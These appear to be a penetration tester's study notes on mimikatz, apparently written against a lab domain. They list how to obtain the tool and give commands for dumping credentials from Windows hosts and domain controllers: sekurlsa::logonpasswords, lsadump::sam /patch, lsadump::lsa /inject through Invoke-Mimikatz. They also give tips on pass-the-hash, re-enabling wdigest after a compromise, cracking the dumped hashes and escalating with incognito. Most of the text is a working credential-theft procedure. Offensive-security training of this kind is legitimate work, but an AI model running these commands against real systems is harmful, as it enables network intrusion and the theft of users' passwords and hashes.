mimikatz
- Tool for password/Hash hunting
- Will be detected by antivirus
installation
- download from https://github.com/gentilkiwi/mimikatz
- or use pypykatz
usage
- Invoke-Mimikatz
- get mimikatz on an owned domain controller
- execute mimikatz (also read documentation in mimikatz wiki)
- privilege::debug
- sekurlsa::logonpasswords
- NTLM-hashes will be given (not v2), so we can use this to pass the hash
- also check wdigest (windows 7 and before)
- you might be able to active it after a compromise
- lsadump::sam
- lsadump::sam /patch
- lsadump::lsa /patch → more ntlm hashes
- try to crack this, find out how good their password policy is
dump stuff (when domain admin)
- must be domain admin to do this
invoke-mimikatz -Command '"privilege::debug" "LSADump:LSA /inject" exit' -Computer HYDRA.marvel.localHint: can use incognito to get to high level domain admin account